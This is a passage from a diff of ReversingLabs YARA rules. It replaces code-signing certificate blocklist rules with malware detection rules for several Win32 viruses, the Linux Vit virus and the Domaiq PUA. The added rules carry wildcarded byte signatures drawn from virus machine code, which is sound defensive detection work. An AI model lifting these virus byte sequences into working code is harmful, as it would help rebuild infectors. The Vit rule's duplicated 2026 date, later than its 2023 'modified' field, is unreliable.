+            8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06
+            83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7
+            80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33
+            C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ??
+        }
+		$mocket_body_2 = {
+            50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80
+            BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ??
+            ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF
+            D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ??
+            ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0
+            0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00
+            00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ??
+            ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00
+            40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ??
+        }
+		$mocket_body_3 = {
+            ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1
+            03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24
+            20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ??
+            ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ??
+            8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ??
+            ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56
+            8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A
+            02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $mocket_body_1 at pe.entry_point ) and $mocket_body_2 and $mocket_body_3
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Greenp virus."
 		author = "ReversingLabs"
-		id = "4b5abcfe-259e-5029-822b-c191b8d2c607"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5751e91c-652b-59bd-93b8-ece677ad4911"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5616-L5634"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Greenp.yara#L3-L46"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f"
+		logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Greenp"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$greenp_body_1 = {
+            68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01
+            50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC
+            6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00
+            FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ??
+            ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF
+            95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46
+            0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4
+            68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ??
+            ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1
+            8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43
+            10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42
+            50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ??
+            ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99
+        }
+		$greenp_body_2 = {
+            68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95
+            ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ??
+            ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ??
+            ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SCABONE PTY LTD" and ( pe.signatures [ i ] . serial == "00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures [ i ] . serial == "b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" ) and 1572566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $greenp_body_1 at pe.entry_point ) and $greenp_body_2
 }
 
-rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cmay virus."
 		author = "ReversingLabs"
-		id = "cc147c06-e0cf-5536-be3c-17e838b346a9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5636-L5652"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Cmay.yara#L3-L73"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc"
+		logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Cmay"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$cmay_body_1 = {
+            60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03
+            00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ??
+            ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ??
+            ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D
+            ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D
+            ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF
+            85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74
+            6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35
+            96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5
+            ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ??
+            ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ??
+            ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74
+            05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
+            8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95
+            ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3
+            18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D
+            ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ??
+            ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89
+            70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54
+        }
+		$cmay_body_2 = {
+            30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ??
+            ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00
+            00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ??
+            ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78
+            03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ??
+            AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80
+            3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 00 74 03 46
+            EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6
+            74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ??
+            ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ??
+            ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3
+            8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95
+            ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF
+            B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ??
+            C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ??
+            ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00
+            00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $cmay_body_1 at pe.entry_point ) and $cmay_body_2
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Elerad virus."
 		author = "ReversingLabs"
-		id = "4696fc12-16b7-575f-b90f-aa0a5cc12852"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0307a136-ea2c-584c-bfda-f41e2c46fd09"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5654-L5672"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Elerad.yara#L3-L33"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd"
+		logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Elerad"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$elerad_body = {
+            EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74
+            08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE
+            00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB
+            20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81
+            ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40
+            00 31 10 83 C0 04 E2 F9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures [ i ] . serial == "d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" ) and 1597622400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $elerad_body at pe.entry_point )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE
+rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Vit virus."
 		author = "ReversingLabs"
-		id = "52b11933-f22c-53ea-88b7-75b3242907dd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4515fe43-4c5a-521d-82b7-273823f0c64e"
+		date = "2026-03-01"
+		date = "2026-03-01"
+		modified = "2023-06-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5674-L5690"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Linux.Virus.Vit.yara#L3-L36"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22"
-		score = 75
+		logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9"
+		score = 40
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$vit_entry_point = {
+        55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4
+        CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7
+        85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8
+        18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA
+        FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56
+        E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9
+        FF FF BE FF FF FF FF 6A 00 6A 00 E9
+      }
+		$vit_str = "vi324.tmp"
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE
+rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Awfull virus."
 		author = "ReversingLabs"
-		id = "29b1803e-90ee-5390-9548-20b24a3de218"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "34104923-b401-5d39-883b-aa9a5a8e64f3"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5692-L5710"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Awfull.yara#L3-L33"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2"
+		logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Awfull"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$awfull_body = {
+              60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256]
+              33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02
+              5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA
+              EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ??
+              [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ??
+              56 5F AC F6 D0 AA 49 E3 02 EB F7
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and ( pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures [ i ] . serial == "e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" ) and 1600786458 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $awfull_body at pe.entry_point )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE
+rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Domaiq potentially unwanted application."
 		author = "ReversingLabs"
-		id = "1adc776c-1549-5149-bd2f-81920a8d7255"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388"
+		date = "2020-07-28"
+		modified = "2020-07-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5712-L5730"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/pua/Win32.PUA.Domaiq.yara#L1-L169"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d"
+		logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "PUA"
+		tc_detection_name = "Domaiq"
+		tc_detection_factor = 1
 		importance = 25
 
+	strings:
+		$payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg"
+		$NSIS_CheckIntegrity = {
+            57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45
+            D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81
+            7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45
+            08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ??
+            ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75
+        }
+		$NSIS_ErrorPart = {
+            81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44
